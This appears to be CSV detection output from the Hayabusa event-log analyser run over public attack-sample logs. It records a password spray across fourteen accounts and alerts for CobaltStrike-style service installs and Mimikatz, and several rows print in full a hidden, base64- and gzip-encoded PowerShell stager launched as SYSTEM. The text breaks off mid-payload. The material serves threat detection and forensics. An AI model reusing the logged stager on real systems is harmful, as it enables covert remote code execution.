DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqG